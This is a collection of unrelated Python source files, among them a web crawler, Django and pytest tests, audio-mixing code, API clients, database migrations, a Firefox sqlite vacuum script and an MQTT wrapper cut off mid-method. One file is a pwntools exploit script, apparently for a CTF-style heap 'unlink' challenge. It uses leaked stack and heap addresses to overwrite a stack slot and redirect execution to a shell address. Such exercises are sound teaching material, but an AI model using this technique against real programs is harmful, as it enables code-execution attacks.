        time_do.append('{}'.format(k['TimeOpen']['Hours']) + ':' + '{}'.format(
            k['TimeOpen']['Minutes']) + '-' + '{}'.format(k['TimeClose']['Hours']) + ':' + '{}'.format(
            k['TimeClose']['Minutes']))
    review_point = []
    for point in data['AvgPointList']:
        review_point.append({point['Label']: point['Point']})
    try:
        information = {
            'name': data['Name'],
            'address': data['Address'],
            'city': data['City'],
            'district': data['District'],
            'priceMin': data['PriceMin'],
            'priceMax': data['PriceMax'],
            'Time': time_do,
            'review_point': review_point,
            'menu': get_menu(menu),
            # 'cmt': get_cmt(cmt),
            'website': link_foody_store,
        }
    except IOError:
        # NOTE(review): missing keys would raise KeyError, not IOError, so
        # this handler likely never fires — confirm the intended exception.
        print("Error")
        information = None
    return information
def crawl_data_from(data_link: str, dest_link: str, driver_path: str, limit: int = 500, path_id: int = 0):
    """Crawl the stores listed in one link file and save each as JSON.

    The link file is split into 100 equal slices; only slice ``path_id``
    is processed, and at most ``limit`` stores are saved.

    :param data_link: path of the text file with one store link per line
    :param dest_link: directory to write per-store JSON files into
    :param driver_path: path to the chromedriver executable
    :param limit: maximum number of stores to save in this run
    :param path_id: which 1/100th slice of the file to process
    """
    print("Crawl Data from {}, save to {}, limit by {}".format(data_link, dest_link, limit))
    with open(data_link, 'r', encoding='utf-8') as f:
        cnt = 0
        t = f.read()
        s = t.count('\n')
        start = int(s / 100) * path_id
        t = t.split("\n")
        for i, line in enumerate(t):
            if i < start:
                continue
            elif i >= int(s / 100) * (path_id + 1):
                break
            elif cnt >= limit:
                break
            line = line.strip('\n')
            diner_name = line.split("/")[-1]
            try:
                # Fix: the original opened the file inside try and closed it
                # in finally; when open() itself raised, the finally clause
                # hit an unbound name. A with-block closes it safely instead.
                with open(dest_link + "/" + diner_name + ".json", "w", encoding="utf-8") as out_file:
                    value = get_full_information(line, driver_path)
                    try:
                        json.dump(value, out_file, ensure_ascii=False, indent=4)
                        cnt += 1
                        if cnt >= limit:
                            break
                    except IOError:
                        print("Some error occur at " + diner_name)
            except Exception as e:
                # Best-effort crawl: log the failure and continue with the
                # next store rather than aborting the whole run.
                print(str(e))
def crawl(load_data_path: str, save_data_path: str, driver_path: str, limit: int, path_id: int = 0):
    """Crawl every link file in ``load_data_path`` into per-file output folders.

    Each input file gets a folder named "<stem>_<path_id>" under
    ``save_data_path``.

    :raises Exception: when the input directory does not exist
    """
    if not os.path.exists(load_data_path):
        raise Exception("Data path not found")
    if not os.path.exists(save_data_path):
        os.mkdir(save_data_path)
    for name in os.listdir(load_data_path):
        filename, ext = os.path.splitext(name)
        # One output directory per input file and slice id.
        target_dir = save_data_path + "/" + filename + "_{}".format(str(path_id))
        if not os.path.exists(target_dir):
            os.mkdir(target_dir)
        crawl_data_from(load_data_path + "/" + name, target_dir, driver_path, limit=limit, path_id=path_id)
def craw_in_range(load_data_path: str, save_data_path: str, driver_path: str,
                  limit: int, left: int = 0, right: int = 100):
    """Run crawl() once per slice id ("epoch") in the inclusive range [left, right]."""
    for epoch in range(left, right + 1):
        print("Start crawl at epoch {}".format(str(epoch)))
        crawl(load_data_path, save_data_path, driver_path, limit, epoch)
        print("Complete crawl at epoch {}".format(str(epoch)))
|
from django.test import TestCase
from core.models.base import OrderType, OutcomeType, PieceType
from core.game import create_new_pieces
from core.tests import DiplomacyTestCaseMixin
class TestCreateNewPieces(TestCase, DiplomacyTestCaseMixin):
    """Tests for ``core.game.create_new_pieces``: pieces are created only
    for successful BUILD orders of the processed turn."""

    def setUp(self):
        # Minimal fixture: a processed turn in a game with two nations and
        # two home territories.
        self.variant = self.create_test_variant()
        self.game = self.create_test_game(variant=self.variant)
        self.turn = self.create_test_turn(game=self.game, processed=True)
        self.england = self.variant.nations.create(name='England')
        self.france = self.variant.nations.create(name='France')
        self.london = self.create_test_territory(variant=self.variant, name='London')
        self.paris = self.create_test_territory(variant=self.variant, name='Paris')

    def test_create_new_pieces_no_orders(self):
        # No orders at all -> nothing to build.
        pieces = create_new_pieces(self.turn)
        self.assertEqual(pieces, [])

    def test_create_new_pieces_failing_order(self):
        # A failed build order must not create a piece.
        self.turn.orders.create(
            source=self.london,
            outcome=OutcomeType.FAILS,
            nation=self.england,
            type=OrderType.BUILD,
            piece_type=PieceType.ARMY,
        )
        pieces = create_new_pieces(self.turn)
        self.assertEqual(pieces, [])

    def test_create_new_pieces_army(self):
        # A successful army build creates one army for the ordering nation.
        self.turn.orders.create(
            source=self.london,
            outcome=OutcomeType.SUCCEEDS,
            nation=self.england,
            type=OrderType.BUILD,
            piece_type=PieceType.ARMY,
        )
        pieces = create_new_pieces(self.turn)
        self.assertEqual(len(pieces), 1)
        piece = pieces[0]
        self.assertEqual(piece.nation, self.england)
        self.assertEqual(piece.game, self.game)
        self.assertEqual(piece.type, PieceType.ARMY)

    def test_create_new_fleet(self):
        # The piece type follows the order's piece_type (fleet here).
        self.turn.orders.create(
            source=self.london,
            outcome=OutcomeType.SUCCEEDS,
            nation=self.england,
            type=OrderType.BUILD,
            piece_type=PieceType.FLEET,
        )
        piece = create_new_pieces(self.turn)[0]
        self.assertEqual(piece.type, PieceType.FLEET)

    def test_create_both_types_different_nations(self):
        # Two successful builds by different nations -> two pieces.
        self.turn.orders.create(
            source=self.london,
            outcome=OutcomeType.SUCCEEDS,
            nation=self.england,
            type=OrderType.BUILD,
            piece_type=PieceType.ARMY,
        )
        self.turn.orders.create(
            source=self.paris,
            outcome=OutcomeType.SUCCEEDS,
            nation=self.france,
            type=OrderType.BUILD,
            piece_type=PieceType.FLEET,
        )
        pieces = create_new_pieces(self.turn)
        self.assertEqual(len(pieces), 2)

    def test_create_both_types_same_nation(self):
        # Two successful builds by the same nation also yield two pieces.
        self.turn.orders.create(
            source=self.london,
            outcome=OutcomeType.SUCCEEDS,
            nation=self.england,
            type=OrderType.BUILD,
            piece_type=PieceType.ARMY,
        )
        self.turn.orders.create(
            source=self.paris,
            outcome=OutcomeType.SUCCEEDS,
            nation=self.england,
            type=OrderType.BUILD,
            piece_type=PieceType.FLEET,
        )
        pieces = create_new_pieces(self.turn)
        self.assertEqual(len(pieces), 2)
|
from spiral.core.foundation import TestApp
from spiral.core.ml import MLHandler, MLInterface
from pytest import raises
# module tests
class TestMLInterface:
    """Unit tests for the MLInterface declaration."""

    def test_interface(self):
        # The interface must be registered under the "ml" label.
        expected_label = "ml"
        assert MLInterface.Meta.interface == expected_label
class TestMLHandler:
    """Unit tests for subclassing MLHandler."""

    def test_subclassing(self):
        # A concrete subclass should inherit the "ml" interface and expose
        # its own label through _meta.
        class MyMLHandler(MLHandler):
            class Meta:
                label = "my_ml_handler"

            def random_forest(self):
                pass

        handler = MyMLHandler()
        assert handler._meta.interface == "ml"
        assert handler._meta.label == "my_ml_handler"
# app functionality and coverage tests
def test_unproviding_handler():
    """Registering a handler that omits the interface's abstract methods
    must raise a TypeError."""
    class BogusHandler(MLHandler):
        class Meta:
            label = "bogus"

    with TestApp() as app:
        # abc refuses to instantiate classes with unimplemented abstract methods.
        msg = "Can't instantiate abstract class .* with abstract methods"
        with raises(TypeError, match=msg):
            app.handler.register(BogusHandler)
|
import sys
import pandas as pd
from . import option, data, yahoo
def main():
    """Print tickers with upcoming earnings that pass data.evaluate.

    Returns the process exit code (0 on success).
    """
    args = option.build_parser().parse_args()
    # pandas config: plain float formatting, no row/column truncation.
    pd.set_option("display.float_format", lambda x: f"{x:f}")
    pd.set_option("display.max_rows", None)
    pd.set_option("display.max_columns", None)
    symbols = yahoo.get_stocks_with_earnings_between(args.start, args.end)
    stocks = [yahoo.Stock(symbol) for symbol in symbols]
    for stock in stocks:
        if data.evaluate(stock):
            print(stock.ticker)
    return 0
if __name__ == "__main__":
    # Propagate main()'s return value as the process exit status.
    sys.exit(main())
|
import torch
from torch import Tensor
from radiomixer.io.signal import SignalFeature
from radiomixer.transforms.concatenator.concatenator import Concatenator
from radiomixer.transforms.transform import TransformType
class SummationConcatenator(Concatenator):
    """
    Mix several signals into one by element-wise summation.
    All inputs are assumed to share the same length and shape.
    """
    def __init__(self):
        super().__init__(TransformType.SummationConcatenator)
    def _concatenate(self, signals: list) -> SignalFeature:
        """
        It is assumed that input signals have the same lengths,
        hence the current concatenation of the signals is a simple
        summation.

        :signals: list of SignalFeature objects to mix
        :return: SignalFeature holding the summed audio plus the collected
            labels, parameters and source files of every input signal
        """
        parameters, labels, files = [], [], []
        # Accumulator shaped like the last signal; all signals are assumed
        # to share this shape.
        signal_out = torch.zeros(signals[-1].data.shape)
        for signal in signals:
            data = signal.data
            signal_out += data
            # One label entry per sample of this signal.
            # NOTE(review): append() nests one list per signal here, while
            # SequentialConcatenator flattens labels with extend() - confirm
            # which shape downstream consumers expect.
            labels.append([signal.parameters["label"]] * data.shape[-1])
            parameters.append(signal.parameters)
            files.append(signal.file)
        # Sample rate is taken from the last input signal.
        signal = SignalFeature(sample_rate = signals[-1].sample_rate,
                               data = signal_out,
                               data_features = None,
                               file = files,
                               parameters = parameters,
                               parameters_own={
                                   "duration":signal_out.shape[1],
                                   "labels": labels})
        return signal
# ---------------------------SequentialConcatenator---------------------------
class SequentialConcatenator(Concatenator):
    """
    Sequentially concatenate different segments
    with randomly sampled silence between the segments.
    """
    def __init__(self):
        super().__init__(TransformType.SEQUENTIALCONCATENATOR)
    def _concatenate(self, signals: list) -> SignalFeature:
        """
        Join the signals in order, inserting pre-sampled silences between
        consecutive segments (no silence after the last one).

        :signals: list of SignalFeature objects to join
        :return: SignalFeature with the joined audio and per-sample labels
        """
        n_signals = len(signals)
        # generate silence
        # Silence lengths were sampled upstream and travel in the last
        # signal's parameters.
        silences_lengths = signals[-1].parameters['silences_lengths']
        silences = [torch.zeros((1,l)) for l in silences_lengths]
        # generate final audio and labels
        data, labels = [], []
        for idx, signal in enumerate(signals):
            data.append(signal.data)
            # One label per sample of the segment.
            labels.extend([signal.parameters['label']]*signal.data.shape[1])
            if idx == n_signals-1:
                # No trailing silence after the final segment.
                pass
            else:
                data.append(silences[idx])
                # Label 0 marks silence samples.
                labels.extend([0]*silences[idx].shape[1])
        return self._create_Signal(data = data,
                                   labels = labels,
                                   signals = signals)
    def _create_Signal(self, data: list, labels: list , signals:list) -> SignalFeature:
        """
        Create SignalFeature object with
        all information from which the final
        audio was created.
        :data: list of audio chunks to join along the time axis
        :labels: per-sample labels
        :signals: list of Signals from which the final audio was created
        """
        # Average the input sample rates.
        # NOTE(review): presumably all inputs share one rate, in which case
        # the mean is just that rate - confirm upstream invariants.
        sample_rate = 0
        files, parameters = [], []
        for signal in signals:
            sample_rate += signal.sample_rate
            files.append(signal.file)
            parameters.append(signal.parameters)
        # Join the chunks along the time dimension.
        audio = torch.concat(data, dim=1)
        signal = SignalFeature(sample_rate = sample_rate/len(signals),
                               data = audio,
                               labels = labels,
                               data_features = None,
                               file = files,
                               parameters = parameters,
                               parameters_own={"duration":audio.shape[1]})
        return signal
|
from pwn import *
# Exploit script for ./unlink: reads a stack and a heap address leaked by the
# target, then sends a payload that overwrites a stack slot via an
# unlink-style write so execution reaches shell_addr.
p = process('./unlink')
p.recvuntil('stack address leak: ')
# Leaked lines look like "0x...": drop the "0x" prefix and parse as hex.
stack_addr = int(p.recvline()[2:], 16)
log.success('stack: {:#x}'.format(stack_addr))
p.recvuntil('heap address leak: ')
heap_addr = int(p.recvline()[2:], 16)
log.success('heap: {:#x}'.format(heap_addr))
# Discard the rest of the banner line.
p.recvline()
# gap between chunks: 0x18
# NOTE(review): the offsets below (stack+0x10, heap+8+4) are specific to this
# binary's layout - confirm against the target before reuse.
target_addr = stack_addr + 0x10
target_value = heap_addr + 8 + 4
# Hard-coded address inside ./unlink (32-bit) that the overwrite redirects to.
shell_addr = 0x080484eb
# NOTE(review): mixing str ('a'*12) with p32() bytes only works on Python 2
# pwntools; on Python 3 this must be b'a'*12 (and bytes in recvuntil above).
p.send(p32(shell_addr) + 'a'*12 + p32(target_value) + p32(target_addr))
p.interactive()
|
# -*- coding: utf-8 -*-
"""
reqs.py
=============================================
The request client for handling GETs to dagpi
"""
from typing import Optional
import requests
from .errors import DagpiException
class ReqClient():
    """
    Main class for handling requests with dagpi
    Parameters
    ----------
    authorization
        String containing dagpi token
    session
        Optional requests.Session to use for requests
    """
    def __init__(self, authorization: str, session: Optional[requests.Session] = None) -> None:
        self.auth = authorization
        self.url = 'https://api.dagpi.xyz'
        self.user_agent = f'dagpi.py v1.0.0 {requests.utils.default_headers()["User-Agent"]}'
        # A caller-supplied session allows connection re-use/pooling.
        self.session = session or requests.Session()
        self.headers = {
            'Authorization': self.auth,
            'User-Agent': self.user_agent
        }

    @staticmethod
    def _media_type(resp) -> str:
        """Return the response's media type, lower-cased.

        BUG FIX: the original compared the raw Content-Type header for
        equality, so values such as 'application/json; charset=utf-8'
        were wrongly rejected.  Strip any parameters after ';'.
        """
        return resp.headers.get('Content-Type', '').split(';')[0].strip().lower()

    def data(self, endpoint: str) -> dict:
        """
        Sends a GET requests to a Dagpi data endpoint
        Parameters
        ----------
        endpoint
            String containing specific data endpoint
        Returns
        -------
        dict
        Raises
        ------
        DagpiException
            On a non-2xx status or a non-JSON response body.
        """
        url = f'{self.url}/data/{endpoint}'
        resp = self.session.get(url, headers=self.headers)
        # BUG FIX: the original accepted status 300 (a redirect) as success;
        # only the 2xx range is a successful response.
        if 200 <= resp.status_code < 300 and self._media_type(resp) == 'application/json':
            return resp.json()
        raise DagpiException(resp.status_code)

    def image(self, endpoint: str, params: dict) -> tuple[str, bytes]:
        """
        Sends a GET requests to a Dagpi image endpoint
        Parameters
        ----------
        endpoint
            String containing specific data endpoint
        params
            Dict containing image parameters
        Returns
        -------
        tuple[str, bytes]
            The image format ('png' or 'gif') and the raw image bytes.
        Raises
        ------
        DagpiException
            On a non-2xx status or an unexpected content type.
        """
        url = f'{self.url}/image/{endpoint}/'
        resp = self.session.get(url, headers=self.headers, params=params)
        if 200 <= resp.status_code < 300 and self._media_type(resp) in ('image/png', 'image/gif'):
            return self._media_type(resp).replace('image/', ''), resp.content
        raise DagpiException(resp.status_code)
|
##############################################################################
#
# Copyright (c) 2007 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
""" Code from the zope.testing module to help track down memory leaks
TrackRefs works only in a python compiled with the --with-pydebug flag.
An example of how to use TrackRefs in a function is below.
glen = 0
rc = 0
def doit():
newglen = gc.collect()
global glen
if newglen > glen:
print
print "-------------------------------------"
print "more garbage", newglen - glen
glen = newglen
print "-------------------------------------"
print
if refs:
newrc = sys.gettotalrefcount()
global rc
if newrc > rc:
refs.update()
refs.detailed_refcounts(newrc, rc)
rc = newrc
"""
import sys
import gc
class TrackRefs(object):
    """Object to track reference counts across test runs.

    Requires a --with-pydebug CPython build: update() relies on
    sys.getobjects, which only exists there.
    """
    def __init__(self):
        # Per-type instance counts and total refcounts from the last update().
        self.type2count = {}
        self.type2all = {}
        # Delta between the two most recent snapshots; None when unset.
        self.delta = None
        # Sum of all refcounts seen in the last update().
        self.n = 0
        # Prime the baseline; the first delta is meaningless, so discard it.
        self.update()
        self.delta = None
    def update(self):
        """Snapshot per-type counts/refcounts and compute the delta versus
        the previous snapshot."""
        gc.collect()
        obs = sys.getobjects(0)
        type2count = {}
        type2all = {}
        n = 0
        for o in obs:
            if type(o) is str and o == '<dummy key>':
                # avoid dictionary madness
                continue
            # Subtract 3 to compensate for references created by this
            # bookkeeping itself (the getrefcount call, loop var, obs list).
            all = sys.getrefcount(o) - 3
            n += all
            t = type(o)
            try:
                # Prefer the instance's class when it differs from type(o).
                t = o.__class__
            except Exception:
                pass
            if t in type2count:
                type2count[t] += 1
                type2all[t] += all
            else:
                type2count[t] = 1
                type2all[t] = all
        # Changes for types present now (current minus previous counts) ...
        ct = [(
            type_or_class_title(t),
            type2count[t] - self.type2count.get(t, 0),
            type2all[t] - self.type2all.get(t, 0),
            )
            for t in type2count.keys()]
        # ... plus negative entries for types that disappeared entirely.
        ct += [(
            type_or_class_title(t),
            - self.type2count[t],
            - self.type2all[t],
            )
            for t in self.type2count.keys()
            if t not in type2count]
        ct.sort()
        self.delta = ct
        self.type2count = type2count
        self.type2all = type2all
        self.n = n
    def output(self):
        """Print the per-type delta table built by update(), then reset it."""
        printed = False
        s1 = s2 = 0
        for t, delta1, delta2 in self.delta:
            if delta1 or delta2:
                if not printed:
                    # Emit the header only once, and only if there is a delta.
                    print (
                        ' Leak details, changes in instances and refcounts'
                        ' by type/class:')
                    print(" %-55s %6s %6s" % ('type/class', 'insts', 'refs'))
                    print(" %-55s %6s %6s" % ('-' * 55, '-----', '----'))
                    printed = True
                print(" %-55s %6d %6d" % (t, delta1, delta2))
                s1 += delta1
                s2 += delta2
        if printed:
            print(" %-55s %6s %6s" % ('-' * 55, '-----', '----'))
            print(" %-55s %6s %6s" % ('total', s1, s2))
        self.delta = None
    def detailed_refcounts(self, rc, prev):
        """Report a change in reference counts, with extra detail."""
        print (" sum detail refcount=%-8d"
               " sys refcount=%-8d"
               " change=%-6d"
               % (self.n, rc, rc - prev))
        self.output()
def type_or_class_title(t):
    """Return a human-readable title for a type or class.

    Builtins are shown bare (e.g. ``int``); everything else is qualified
    with its module (e.g. ``collections.OrderedDict``).
    """
    module = getattr(t, '__module__', '__builtin__')
    # BUG FIX: '__builtin__' is the Python 2 name only; on Python 3 builtin
    # types report __module__ == 'builtins', so they were wrongly rendered
    # as e.g. 'builtins.int'.  Accept both names.
    if module in ('__builtin__', 'builtins'):
        return t.__name__
    return "%s.%s" % (module, t.__name__)
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from migrate import exceptions as versioning_exceptions
from migrate.versioning import api as versioning_api
from migrate.versioning import repository as versioning_repository
from oslo.config import cfg
from glance.common import exception
import glance.openstack.common.log as logging
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
def db_version():
    """
    Return the database's current migration number
    :retval version number
    :raises exception.DatabaseMigrationError: if the database is not under
        migration control
    """
    repo_path = get_migrate_repo_path()
    sql_connection = CONF.sql_connection
    try:
        return versioning_api.db_version(sql_connection, repo_path)
    except versioning_exceptions.DatabaseNotControlledError:
        # Translate the third-party error into this project's exception type.
        # (Dropped the unused `as e` binding and redundant parentheses.)
        msg = _("database is not under migration control")
        raise exception.DatabaseMigrationError(msg)
def upgrade(version=None):
    """
    Upgrade the database's current migration level
    :param version: version to upgrade (defaults to latest)
    :retval version number
    """
    db_version()  # Ensure db is under migration control
    repo_path = get_migrate_repo_path()
    sql_connection = CONF.sql_connection
    version_str = version or 'latest'
    # Lazy %-style logging args: interpolation happens only if INFO is
    # enabled (the original interpolated eagerly with %).
    LOG.info(_("Upgrading database to version %s"), version_str)
    return versioning_api.upgrade(sql_connection, repo_path, version)
def downgrade(version):
    """
    Downgrade the database's current migration level
    :param version: version to downgrade to
    :retval version number
    """
    db_version()  # Ensure db is under migration control
    repo_path = get_migrate_repo_path()
    sql_connection = CONF.sql_connection
    # Lazy %-style logging args instead of eager % interpolation.
    LOG.info(_("Downgrading database to version %s"), version)
    return versioning_api.downgrade(sql_connection, repo_path, version)
def version_control(version=None):
    """
    Place a database under migration control
    :param version: version to stamp the database with (defaults to the
        repository's latest version)
    :raises exception.DatabaseMigrationError: if the database is already
        under migration control
    """
    # (Dropped an unused local `sql_connection` and the unused `as e`
    # binding; _version_control reads the connection itself.)
    try:
        _version_control(version)
    except versioning_exceptions.DatabaseAlreadyControlledError:
        msg = _("database is already under migration control")
        raise exception.DatabaseMigrationError(msg)
def _version_control(version):
    """
    Place a database under migration control
    This will only set the specific version of a database, it won't
    run any migrations.
    :param version: version to stamp the database with; None means the
        migrate repository's latest version
    """
    repo_path = get_migrate_repo_path()
    sql_connection = CONF.sql_connection
    if version is None:
        # Default to the newest revision available in the repository.
        version = versioning_repository.Repository(repo_path).latest
    return versioning_api.version_control(sql_connection, repo_path, version)
def db_sync(version=None, current_version=None):
    """
    Place a database under migration control and perform an upgrade
    :param version: target version (None means latest)
    :param current_version: version to stamp the database with before
        syncing; None means ask the database
    :retval version number
    """
    # (Dropped an unused local `sql_connection`; helpers read CONF directly.)
    try:
        _version_control(current_version or 0)
    except versioning_exceptions.DatabaseAlreadyControlledError:
        # Already controlled: nothing to stamp, proceed with the sync.
        pass
    if current_version is None:
        current_version = int(db_version())
    # Downgrade when the target is below the current level, upgrade when it
    # is above (or unspecified); equal versions are a no-op.
    if version is not None and int(version) < current_version:
        downgrade(version=version)
    elif version is None or int(version) > current_version:
        upgrade(version=version)
def get_migrate_repo_path():
    """Get the path for the migrate repository."""
    # The repository lives next to this module in 'migrate_repo'.
    path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
                        'migrate_repo')
    # NOTE(review): assert is stripped under `python -O`; a missing repo
    # would then surface later with a less obvious error.
    assert os.path.exists(path)
    return path
|
import os
from concurrent.futures import ProcessPoolExecutor
from functools import partial
from in_out import load_sample
import librosa
import numpy as np
from tqdm import tqdm
def check_directory(directory, good_path: str, bad_path: str, checks: list,
                    max_workers: int = 16):
    '''
    Runs check_sample on all samples in a directory
    Input arguments:
    * directory (str): A path to a directory containing one or more
        waveform files
    * good_path (str): Target path for the file listing passing samples,
        one path per line
    * bad_path (str): Target path for the file listing failing samples as
        "<path>\t<failed check name>" lines
    * checks (list): A list of callable checks that return False if
        the sample passes the check
    * max_workers (int=16): The number of parallel workers
    '''
    futures = []
    # Context manager guarantees the worker pool is shut down even if a
    # check raises (the original never shut the executor down).
    with ProcessPoolExecutor(max_workers=max_workers) as executor:
        for path in [os.path.join(directory, fname) for fname in os.listdir(directory)]:
            futures.append((path, executor.submit(partial(check, path, checks))))
        answers = [(path, future.result()) for path, future in tqdm(futures)]
    with open(good_path, 'w') as gf, open(bad_path, 'w') as bf:
        for path, (failed, check_name) in tqdm(answers):
            # BUG FIX: the original wrote the stale loop variable `p` and the
            # `check` function object instead of each answer's own path and
            # failed-check name.
            if failed:
                bf.write(f"{path}\t{check_name}\n")
            else:
                gf.write(f"{path}\n")
def check(path: str, checks: list):
    """Load the sample at *path* and run check_sample on its signal.

    Returns check_sample's (failed, check_name) tuple.
    """
    y, sr = load_sample(path)  # sr is unused; only the signal is checked
    return check_sample(y, checks)
def check_sample(y: np.ndarray, checks: list):
    '''
    Returns False if sample passes all checks.
    Input arguments:
    * y (np.ndarray): A [n] shaped numpy array containing the signal
    * checks (list): A list of callable checks that return False if
        the sample passes the check
    Returns a (failed, check_name) tuple; check_name is "" when all pass.
    '''
    # First check (in order) that flags the sample, or None if all pass.
    failed_check = next((c for c in checks if c(y)), None)
    if failed_check is not None:
        return True, failed_check.__name__
    return False, ""
def signal_is_too_high(y: np.ndarray, thresh: float = -4.5, num_frames: int = 1):
    '''
    If the signal exceeds the threshold for a certain number of frames or
    more consecutively, it is deemed too high
    Input arguments:
    * y (np.ndarray): A [n] shaped numpy array containing the signal
    * thresh (float=-4.5): A db threshold
    * num_frames (int=1): A number of consecutive frames
    '''
    db = librosa.amplitude_to_db(y)
    # Count consecutive values above the threshold; reset on any dip below.
    thresh_count = 0
    for i in range(len(db)):
        if db[i] > thresh:
            thresh_count += 1
            if thresh_count == num_frames:
                return True
        else:
            thresh_count = 0
    return False
def signal_is_too_low(y: np.ndarray, thresh: float = -15):
    '''
    If the signal never exceeds the threshold it is deemed too low
    Input arguments:
    * y (np.ndarray): A [n] shaped numpy array containing the signal
    * thresh (float=-15): A db threshold
    '''
    db = librosa.amplitude_to_db(y)
    # True only when every dB value stays at or below the threshold.
    return not any(db_val > thresh for db_val in db)
"""`bucky viz` CLI."""
import multiprocessing
from enum import Enum
from pathlib import Path
from typing import List, Optional
import typer
from ..viz.plot import main as plot_main
app = typer.Typer()
class AdmLevel(str, Enum):
    """Admin levels accepted by `--levels`; the value is the CLI string."""
    adm0 = "adm0"
    adm1 = "adm1"
    adm2 = "adm2"
@app.command("plot")
def plot(
ctx: typer.Context,
input_dir: Optional[Path] = typer.Option(None, help="Directory of input data to plot"),
output_dir: Optional[Path] = typer.Option(None, help="Directory for created plots"),
levels: List[AdmLevel] = typer.Option(
["adm0", "adm1"],
"--levels",
"-l",
case_sensitive=False,
help="Adm levels to generate plots of",
),
columns: List[str] = typer.Option(
["daily_reported_cases", "daily_deaths"],
"--columns",
"-c",
help="Columns to plot",
),
num_proc: int = typer.Option(
-1,
"--num_proc",
"-np",
help="Number of parallel procs to use",
),
n_hist: int = typer.Option(28, "--nhist", "-nh", help="Number of historical days to include in plot"),
hist_window_size: int = typer.Option(
7,
"--window",
"-w",
help="Window size for rolling mean of plotted historical data points",
),
plot_hist: bool = typer.Option(True, "--plot_hist", help="Plot historical data points"),
plot_fit: bool = typer.Option(True, "--plot_fit", help="Plot historical data fit"),
adm_mapping_file: str = typer.Option(None, help="Location of admin mapping file"),
):
"""`bucky viz plot`, produce matplotlib quantile plots from output files."""
cfg = ctx.obj
if input_dir is None:
base_dir = cfg["system.output_dir"]
input_dir = sorted(base_dir.iterdir(), key=lambda path: path.stat().st_ctime)[-1]
cfg["plot.input_dir"] = input_dir
cfg["plot.output_dir"] = output_dir
cfg["plot.levels"] = [level.name for level in levels]
cfg["plot.columns"] = columns
cfg["plot.n_hist"] = n_hist
cfg["plot.window_size"] = hist_window_size
cfg["plot.plot_hist"] = plot_hist
cfg["plot.hist_data_dir"] = cfg["system.data_dir"]
cfg["plot.plot_fit"] = plot_fit
if adm_mapping_file is None:
cfg["plot.adm_mapping_file"] = cfg["system.data_dir"] / "adm_mapping.csv"
else:
cfg["plot.adm_mapping_file"] = adm_mapping_file
# Number of processes for pool
if num_proc == -1:
num_proc = multiprocessing.cpu_count() // 2
cfg["plot.num_proc"] = num_proc
plot_main(cfg["plot"])
|
#!/usr/bin/env python
import os, sqlite3
# -------------- constants -----------------------------------------
# Root directory holding all Firefox profiles for the current user.
profilAppMain=os.path.join(os.environ["HOME"], ".mozilla/firefox")
profilUser= os.environ["USER"]
# NOTE(review): os.path.join discards profilUser because profilAppMain is
# absolute, so profilApp == profilAppMain in practice - presumably intended,
# but verify.
profilApp = os.path.join(profilUser,profilAppMain)
# -------------- functions -----------------------------------------
def searchProfil(profilApp):
    "all firefox profiles"
    # NOTE(review): the parameter shadows the module-level profilApp.
    # Vacuum the sqlite files of every entry under the profiles root.
    for profil in os.listdir(profilApp):
        profilFull=os.path.join(profilApp, profil)
        searchSqlite(profilFull)
def searchSqlite(profil):
    "all sqlite file in each firefox profile"
    # Skip non-directories (e.g. profiles.ini next to the profile folders).
    if not os.path.isdir(profil):
        return
    sq=[os.path.join(profil,s) for s in os.listdir(profil) if s.endswith(".sqlite")]
    print "\n..."+profil[len(profilUser):]
    for s in sq:
        dirName, fileName=os.path.split(s)  # dirName is unused
        conn = sqlite3.connect(s)
        # Remember the pre-vacuum size so the shrink ratio can be reported.
        old=os.path.getsize(s)
        print fileName+":",
        try:
            c=conn.cursor()
            c.execute("VACUUM") # this is the thing
            c.close()
            print "done.",
            # Report the new size as a percentage of the old one.
            new=os.path.getsize(s)
            print new*1.0/old*100,"%"
        except:
            # NOTE(review): bare except hides the failure reason; also conn
            # is never closed on either path - consider close() in a finally.
            print "error."
# ----------------- main -------------------------------------------
if __name__=="__main__":
    # Only vacuum when the Firefox profile directory actually exists.
    if os.path.isdir(profilApp):
        searchProfil(profilApp)
    else:
        print "Not exist:", profilApp
import logging
import paho.mqtt.client as mqtt
logger = logging.getLogger(__name__)
class Mqtt:
    """Small convenience wrapper around paho-mqtt.

    Connects to the broker on construction (best effort: a failed connect
    logs a warning and leaves the object unconnected).  When both
    `subscription_topic` and `mqtt_callback` are given, incoming messages
    on that topic are forwarded to the callback.
    """
    def __init__(self, broker, port=1883, subscription_topic=None, mqtt_callback=None):
        self.broker = broker
        self.port = port
        self.mqtt_callback = mqtt_callback
        self.connected_to_mqtt = False
        self.subscription_topic = subscription_topic
        try:
            self.connect_mqtt()
        except Exception:
            # BUG FIX: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit.
            logger.warning("Can't connect to MQTT broker")

    def connect_mqtt(self):
        """Create the client, connect, subscribe if configured, and block
        until the broker acknowledges the connection.

        Re-raises whatever the paho client raised on failure.
        """
        self.mq = mqtt.Client()
        self.mq.on_connect = self.on_mqtt_connect
        self.mq.on_disconnect = self.on_mqtt_disconnect
        try:
            self.mq.connect(self.broker, self.port)
            if self.subscription_topic is not None and self.mqtt_callback is not None:
                self.mq.on_message = self.on_mqtt_message
                self.mq.subscribe(self.subscription_topic, qos=1)
            self.mq.loop_start()
            # Busy wait until on_mqtt_connect flips the flag.
            # NOTE(review): this spins a core and never times out if the
            # broker accepts TCP but never sends a CONNACK.
            while not self.connected_to_mqtt:
                pass
        except Exception:
            # BUG FIX: narrowed from a bare `except:`.
            logger.warning("Failed to connect MQTT broker")
            self.connected_to_mqtt = False
            raise

    def on_mqtt_connect(self, client, userdata, flags_dict, rc):
